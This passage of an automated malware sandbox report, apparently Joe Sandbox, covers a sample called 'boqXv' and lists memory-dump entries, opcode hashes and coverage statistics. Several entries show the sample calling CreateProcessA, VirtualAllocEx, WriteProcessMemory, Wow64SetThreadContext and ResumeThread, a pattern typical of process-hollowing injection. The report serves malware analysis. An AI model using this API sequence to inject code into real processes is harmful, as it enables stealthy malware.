                                                • Instruction Fuzzy Hash: BF316130E2021A9FDB15CF6DC4447AEB7B6FF85300F148565E806EB240D7B09982CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q
                                                • API String ID: 0-2625958711
                                                • Opcode ID: f4b07bc907b30e8dc673edc197f1f0c461a6356609c012b07edbf9f310d489b4
                                                • Instruction ID: 9f6af79cc4f24f6d46129a8e2fcda6cb42c452f952db3887af8e83f559e22139
                                                • Opcode Fuzzy Hash: f4b07bc907b30e8dc673edc197f1f0c461a6356609c012b07edbf9f310d489b4
                                                • Instruction Fuzzy Hash: 1E317031E2020ACBDF14CFA8D4547AEB7B6FF85310F248565E806EB240EB70A982CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8baeb8384b2b8878ebb2c5d5cc0cd7b6dcbedc6109cdb65047531b5cc91f184a
                                                • Instruction ID: 5055b777cc6462e34faf1428ab739b360d2e28b2cc8b1d78c2d883d17d612b90
                                                • Opcode Fuzzy Hash: 8baeb8384b2b8878ebb2c5d5cc0cd7b6dcbedc6109cdb65047531b5cc91f184a
                                                • Instruction Fuzzy Hash: 41128F30710302CFCB55AB2CE5992687BB6FB86321B548979E406CB354CF35EC8697A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff2edc721a67870a9fd7fc056631b4ec70713ef0baf9db4452ef0bfc82bdcc1e
                                                • Instruction ID: 620e54450bda3a9554b3168da82fffda90b6bd9ce462319fc2a116f801fb6af6
                                                • Opcode Fuzzy Hash: ff2edc721a67870a9fd7fc056631b4ec70713ef0baf9db4452ef0bfc82bdcc1e
                                                • Instruction Fuzzy Hash: 90B17E70E2020ACFDB10DFAAD98579DFBF5BF48314F188129D854EB294EB749885CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8c2a4f8ca3ed3ad05250fe66f0e77d6d2e7bd502935858f1b17d0ff3e8fd489
                                                • Instruction ID: 5de663e1f02beccc04c52eb09461ff2f1fd01f04ae6bfc6e06564e30d0dbebe6
                                                • Opcode Fuzzy Hash: c8c2a4f8ca3ed3ad05250fe66f0e77d6d2e7bd502935858f1b17d0ff3e8fd489
                                                • Instruction Fuzzy Hash: 38916D38A10205CFDB14DF68D985AADBBB6FF88310F248565E806E7364DB35DD81CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b10b7f7cafdc83ddd47430308cc99329a43e48569e2f522c28109b9149f5393f
                                                • Instruction ID: af3d616693c74cc61cbb9601dbbdac15591ba6225bc349edaeb961dc846b34ee
                                                • Opcode Fuzzy Hash: b10b7f7cafdc83ddd47430308cc99329a43e48569e2f522c28109b9149f5393f
                                                • Instruction Fuzzy Hash: 80A15E70E1020ADFDF14DFAAC9817DDBBF2BF88714F188129E419AB254DB749885CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1898512408.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_18ed000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31821abc8e24f6174345a8d39b26e3cdbc2e4697d53edbe0d80bc976c771b1f7
                                                • Instruction ID: 112da197d37d7b7d6bb10ab86d164ea21f4b62bcb61a144b10800779b57c3e75
                                                • Opcode Fuzzy Hash: 31821abc8e24f6174345a8d39b26e3cdbc2e4697d53edbe0d80bc976c771b1f7
                                                • Instruction Fuzzy Hash: 5E212271604204DFCB15DF58D9C8B26BFA5FB85318F28C66DD80A8B256C33AD54BCA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bec0e3d5fc010a8c82a571280c67b272dd18d3d812f7769327634fd6d1eedce
                                                • Instruction ID: 7d054dae3e74b9de4332b6056b65f7811526479cd2f09a3b21ef5f902cd7e0bc
                                                • Opcode Fuzzy Hash: 4bec0e3d5fc010a8c82a571280c67b272dd18d3d812f7769327634fd6d1eedce
                                                • Instruction Fuzzy Hash: A7218130724306DFDB14DB29C5197AE77F6BF88304F1004A8D506EB250DB75AD91CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c45c311172ab8a8593ea4abddda6f17984be35c1002ace313cb00d3105dad881
                                                • Instruction ID: cd2873ab1652c2e0a84dc138cfa8002852dfc4983c98aa9479bd68015cde9aa0
                                                • Opcode Fuzzy Hash: c45c311172ab8a8593ea4abddda6f17984be35c1002ace313cb00d3105dad881
                                                • Instruction Fuzzy Hash: 59219F71B202158FDB04DB69C954FAE7BFABF88710F148069E501EB3A4DBB19D80CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b88a94c1e79201b936dfd61605d9bdba8973bd7d9a40beec706411b250bcc6cd
                                                • Instruction ID: abba89767737fd2948fe43f3a5968e5a7a97f8fbc6fa32f95c4f5bc507ef8c33
                                                • Opcode Fuzzy Hash: b88a94c1e79201b936dfd61605d9bdba8973bd7d9a40beec706411b250bcc6cd
                                                • Instruction Fuzzy Hash: 70216231E2031A9BCB19CFA4D45099EF7B6BF89350F14851AE815FB340EBB09986CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4dfc07fb47e7a6ad11471221e38886d281f2453ca751a1718711235f2bc4ae95
                                                • Instruction ID: 160ddc6ea11612136d5af37482116e2840e6088b09e1337171b19c576be5cd75
                                                • Opcode Fuzzy Hash: 4dfc07fb47e7a6ad11471221e38886d281f2453ca751a1718711235f2bc4ae95
                                                • Instruction Fuzzy Hash: 50215E34720206CFDB14DB69D5197AE77F6BF88204F1004A8D506EB360DB75AC91CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfbe366f74cd69343f471aa663c140dfd560073652fdc40c493622dbe12df9e1
                                                • Instruction ID: 852bc5607054783948efcc066251e2c26c8a4b1cafb304f47d30003e951f7e92
                                                • Opcode Fuzzy Hash: dfbe366f74cd69343f471aa663c140dfd560073652fdc40c493622dbe12df9e1
                                                • Instruction Fuzzy Hash: 422193347201025FDF11DB2CF888B997769FB49354F148A60E409CB265EB38EC898BD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:179
                                                Total number of Limit Nodes:19

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 025BD116
                                                • GetCurrentThread.KERNEL32 ref: 025BD153
                                                • GetCurrentProcess.KERNEL32 ref: 025BD190
                                                • GetCurrentThreadId.KERNEL32 ref: 025BD1E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID: 89x
                                                • API String ID: 2063062207-2237864334
                                                • Opcode ID: 3fabff09f8414cb40749afe656134beac19f75f64063146903206ea0e76d9090
                                                • Instruction ID: 964475359185213e67e96060a029fd5dfc5a68867e0e81f4c1a33a6e20515d27
                                                • Opcode Fuzzy Hash: 3fabff09f8414cb40749afe656134beac19f75f64063146903206ea0e76d9090
                                                • Instruction Fuzzy Hash: 475166B09016098FDB15DFAAD548BDEBBF1FF48314F208069E419A7360D774A984CF6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 025BD116
                                                • GetCurrentThread.KERNEL32 ref: 025BD153
                                                • GetCurrentProcess.KERNEL32 ref: 025BD190
                                                • GetCurrentThreadId.KERNEL32 ref: 025BD1E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID: 89x
                                                • API String ID: 2063062207-2237864334
                                                • Opcode ID: cba859d33574e8c0e6060b20140ae3fee06181df9d6cc8f3de953997e1be1dfc
                                                • Instruction ID: 193a23cf7102f7ef2d725918550aa0086f5a15e985451a40765f2f616ba46ef1
                                                • Opcode Fuzzy Hash: cba859d33574e8c0e6060b20140ae3fee06181df9d6cc8f3de953997e1be1dfc
                                                • Instruction Fuzzy Hash: 325165B09016098FDB04DFAAD948BDEBBF1FF48314F208059E419A7360D734A984CF6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B8825E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: adf9656f05c2a084725bb3fa6146393ccd0828a053b78dd68de548e91efbfeae
                                                • Instruction ID: c82eb732caacb19a06303023010f8d5855cbcd0892899c0169f0bebe315fed33
                                                • Opcode Fuzzy Hash: adf9656f05c2a084725bb3fa6146393ccd0828a053b78dd68de548e91efbfeae
                                                • Instruction Fuzzy Hash: E0A17DB1D1021ADFEB60DF68C840BDDBBB2FF48314F5481A9E858A7290DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B8825E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 7b99ddc4a5ed08af6522f5a8fa6ad08ff8724258eb0b208c7fc1a9c66704511c
                                                • Instruction ID: 4a4f1bc10a5040e1912a7263b8e4223c073553dd3f2cad91d836db1015910cc1
                                                • Opcode Fuzzy Hash: 7b99ddc4a5ed08af6522f5a8fa6ad08ff8724258eb0b208c7fc1a9c66704511c
                                                • Instruction Fuzzy Hash: 11916EB1D1021ACFEB64DF68C840BDDBBB2FF48310F5481A9E818A7290DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 025BAF56
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 1f0f79af8497f899f9fd528cd196086528fa861de66621742a03f22f6032059c
                                                • Instruction ID: 3617ecaabad1a5d1563c0dd0a2f74640f888668dc1280ea2155e13f5272e15f6
                                                • Opcode Fuzzy Hash: 1f0f79af8497f899f9fd528cd196086528fa861de66621742a03f22f6032059c
                                                • Instruction Fuzzy Hash: 6B7122B0A00B058FDB25DF2AD04479ABBF5FF88304F10892ED08AD7A50DB74E949CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 025B59A9
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 9941b7083d61fd4b4bea0d64538faa1f9915dd2699de57a09e35def70af276fe
                                                • Instruction ID: 1e2f9e441f8b4125cb7d6888146bf8977dca0cf2a29a3ded0ad7eedce362ca25
                                                • Opcode Fuzzy Hash: 9941b7083d61fd4b4bea0d64538faa1f9915dd2699de57a09e35def70af276fe
                                                • Instruction Fuzzy Hash: AF41E3B0C00619CFDB24CF99C8846CDBBF5BF49304F6480AAD409BB255DB756949CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 025B59A9
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 3350cc8a2e911d890e81b30feb0279301fd2f97ac4b5b8b7c66e7d4e5e5217c1
                                                • Instruction ID: 11f737a797c086151ecbd476644abf98f504cda522ae3a26dce54d2795cac68d
                                                • Opcode Fuzzy Hash: 3350cc8a2e911d890e81b30feb0279301fd2f97ac4b5b8b7c66e7d4e5e5217c1
                                                • Instruction Fuzzy Hash: A441F2B0C00719DBDB24CFA9C844BCEBBB5BF49304F6080AAD408BB255EB756949CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025BD367
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: ac73f5bf9fa6b7f9b39d007b4cecf6249fe4c3df577207d2b67d9a646d738555
                                                • Instruction ID: 44cb15c553cffc153b775058d617ffd1ff63d3afc3570bb5825ed362cc460244
                                                • Opcode Fuzzy Hash: ac73f5bf9fa6b7f9b39d007b4cecf6249fe4c3df577207d2b67d9a646d738555
                                                • Instruction Fuzzy Hash: 01313EB8A81340CFE7149F60F894B693BA9F748351F118426D901DB3D9DB785C4AEB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B87A30
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 833e27b65635f33b7e98884be6b51aab53ac821e1d60a273993bedb1501efc99
                                                • Instruction ID: ffe084a99d81a3ccc4fe7c111f781300f82810452a58ef6893da4e4f8bd00654
                                                • Opcode Fuzzy Hash: 833e27b65635f33b7e98884be6b51aab53ac821e1d60a273993bedb1501efc99
                                                • Instruction Fuzzy Hash: 4A2157B19003599FDB10DFA9C884BDEBBF5FF48314F10842AE958A7250C7789944CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B87A30
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 44ff888d8632063c4599b754b97cf4c51e9857c048b198814952d4f719642b89
                                                • Instruction ID: b3455297d81157d32621fdeabc94b2e23855904c7e07823a99ffcafc5216835a
                                                • Opcode Fuzzy Hash: 44ff888d8632063c4599b754b97cf4c51e9857c048b198814952d4f719642b89
                                                • Instruction Fuzzy Hash: C02136B19003599FDB10DFA9C885BDEBBF5FF48314F20842AE959A7250C7789944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B87B10
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 851eb446fcf8223707d160aeec592a24e2edcdc2ac95bdc296589f9d8cc22dab
                                                • Instruction ID: ed35815890892d9697082ed51fcc629932cc2e9308860cac46e9f192e90e07a2
                                                • Opcode Fuzzy Hash: 851eb446fcf8223707d160aeec592a24e2edcdc2ac95bdc296589f9d8cc22dab
                                                • Instruction Fuzzy Hash: 882148B19103599FDB10DFAAC880BEEFBF5FF88324F10842AE558A7250C7389545CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B87886
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 55e835a8e411b6950ee54ac034a9452ae05df027ffaf16369ed244afd17deebf
                                                • Instruction ID: 888ffab9763bf004007e146d950e1ce067cd451c873f280acd2c7036a82e2a4c
                                                • Opcode Fuzzy Hash: 55e835a8e411b6950ee54ac034a9452ae05df027ffaf16369ed244afd17deebf
                                                • Instruction Fuzzy Hash: 46213DB1D103099FDB10DFAAC4857EEBBF4EF88314F148429D459A7240CB789545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025BD367
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: f13c69a21fe194d4f6ee75d0bfb3ccae415828e078f5c23c8f71d0622cea98c0
                                                • Instruction ID: b5c326b6b951ba23322c48be55b7c728ac0bf206abce6923e8a7d6efe97ba687
                                                • Opcode Fuzzy Hash: f13c69a21fe194d4f6ee75d0bfb3ccae415828e078f5c23c8f71d0622cea98c0
                                                • Instruction Fuzzy Hash: 1E21D2B59013189FDB10CFAAD984ADEBBF4FB48320F14802AE958A7351D374A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B87B10
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: b77f975561b931ec65fe2ba0e2365cb79dfb0cef8b4e16f5687c434ac1b37a7f
                                                • Instruction ID: 94eb94f81c9e8ec1c6c008b709e8f27eef304b9508a4d3893322d80ab6cce818
                                                • Opcode Fuzzy Hash: b77f975561b931ec65fe2ba0e2365cb79dfb0cef8b4e16f5687c434ac1b37a7f
                                                • Instruction Fuzzy Hash: C72125B19003599FDB10DFAAC884AEEFBF5FF48324F10842AE559A7250C7389944CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B87886
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 4ef1b7181ea893abc1c2a91a21c6a97f298d708598a94422ba5b8db37d1b399a
                                                • Instruction ID: 92a368e285e18363a6b5b12c42ac85260c614575e999a494396a395295c9407c
                                                • Opcode Fuzzy Hash: 4ef1b7181ea893abc1c2a91a21c6a97f298d708598a94422ba5b8db37d1b399a
                                                • Instruction Fuzzy Hash: A92138B1D003098FDB10DFAAC4857EEBBF4EF88324F10842AD459A7240CB78A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025BD367
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: e6e2cd4acee7840082e108ae209fbf74245bd98278057c99845665a6235cce17
                                                • Instruction ID: 5fd2827caee8d3b38a861b83dd99bfa5ad9aee9a081a673bcba297e52b9f52b0
                                                • Opcode Fuzzy Hash: e6e2cd4acee7840082e108ae209fbf74245bd98278057c99845665a6235cce17
                                                • Instruction Fuzzy Hash: FD21E0B59012189FDB10CFAAD984ADEBBF8FB48320F14801AE958A3250C374A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B8794E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: ae690d67be56fc7889290da87bbbf003d5264b851d31dbff36dbe1e3c8edf774
                                                • Instruction ID: cf90196ec7e7d69a4476dee4d7119cac0312f7d77af61e6e8ad64013e5b3d53b
                                                • Opcode Fuzzy Hash: ae690d67be56fc7889290da87bbbf003d5264b851d31dbff36dbe1e3c8edf774
                                                • Instruction Fuzzy Hash: C81159B19002499FDB10DFAAC844BDEFFF5EF88324F208419E559A7250CB35A544CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025BB3D1,00000800,00000000,00000000), ref: 025BB5C2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: b357ee839806bfc1098e65aacbd4baeef9907581ada6c84dff28a2a43b8a5c09
                                                • Instruction ID: 4921c2761f423e5129b3fb9b0090f63e983371b9b979ffd509dc14185c57269c
                                                • Opcode Fuzzy Hash: b357ee839806bfc1098e65aacbd4baeef9907581ada6c84dff28a2a43b8a5c09
                                                • Instruction Fuzzy Hash: 2D1114B69003489FDB10CF9AD448ADEFBF4FF88314F10842AD919A7250D3B5A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025BB3D1,00000800,00000000,00000000), ref: 025BB5C2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: b6003fb588984b5d43d548e076c3b4b4067316f9f7e72171e24cc174dfded9eb
                                                • Instruction ID: c81d10c4c0ad52c7fc07f9d2564b5c122b5f17d77854297a3c932e47e2e1822a
                                                • Opcode Fuzzy Hash: b6003fb588984b5d43d548e076c3b4b4067316f9f7e72171e24cc174dfded9eb
                                                • Instruction Fuzzy Hash: 7A1112B69002089FDB10CF9AC444ADEFBF4EF88324F10842AE819A7250D375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
